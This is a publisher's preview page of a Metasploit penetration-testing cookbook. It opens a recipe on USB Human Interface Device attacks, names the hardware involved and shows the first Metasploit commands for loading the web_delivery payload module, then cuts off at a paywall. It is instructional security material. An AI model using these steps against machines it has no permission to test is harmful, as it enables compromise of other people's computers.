Search icon CANCEL
Subscription
0
Cart icon
Cart
Close icon
You have no products in your basket yet
Save more on your purchases!
Savings automatically calculated. No voucher code required
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletters
Free Learning
Arrow right icon
Arrow up icon
GO TO TOP
Metasploit Penetration Testing Cookbook. - Third Edition

You're reading from  Metasploit Penetration Testing Cookbook. - Third Edition

Product type Book
Published in Feb 2018
Publisher
ISBN-13 9781788623179
Pages 426 pages
Edition 3rd Edition
Languages
Authors (4):
Nipun Jaswal Nipun Jaswal
Profile icon Nipun Jaswal
Daniel Teixeira Daniel Teixeira
Profile icon Daniel Teixeira
Abhinav Singh Abhinav Singh
Profile icon Abhinav Singh
Monika Agarwal Monika Agarwal
Profile icon Monika Agarwal
View More author details
Toc

Table of Contents (20) Chapters close

Title Page
Copyright and Credits
Contributors
Packt Upsell
Preface
1. Metasploit Quick Tips for Security Professionals 2. Information Gathering and Scanning 3. Server-Side Exploitation 4. Meterpreter 5. Post-Exploitation 6. Using MSFvenom 7. Client-Side Exploitation and Antivirus Bypass 8. Social-Engineer Toolkit 9. Working with Modules for Penetration Testing 10. Exploring Exploits 11. Wireless Network Penetration Testing 12. Cloud Penetration Testing 13. Best Practices 1. Other Books You May Enjoy Index

Human Interface Device attacks


Physical attacks are the most effective and dangerous, of which Human Interface Device (HID) attacks are among my favorite. To compromise a client, you just need to insert a preprogrammed USB stick that is read as an HID, in this case a keyboard that will type and execute the payload.

Getting ready

There are several hardware options you can use, going from a simple Android phone to custom hardware such as Teensy USB HID, which you can order at https://www.pjrc.com/; USB Rubber Ducky, available at https://hakshop.com; or the Cactus WHID from https://github.com/whid-injector/WHID.

How to do it...

  1. Although it is possible to run a basic stageless payload, in my experience using a staged payload with the Script Web Delivery exploit module has proven to be a reliable way to deliver payloads using HID devices:
msf > use exploit/multi/script/web_delivery 
msf exploit(multi/script/web_delivery) > set TARGET 2
TARGET => 2
msf exploit(multi/script/web_delivery) &gt...
lock icon The rest of the chapter is locked
Register for a free Packt account to unlock a world of extra content!
A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.
Unlock this book and the full library FREE for 7 days
Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of
Renews at €14.99/month. Cancel anytime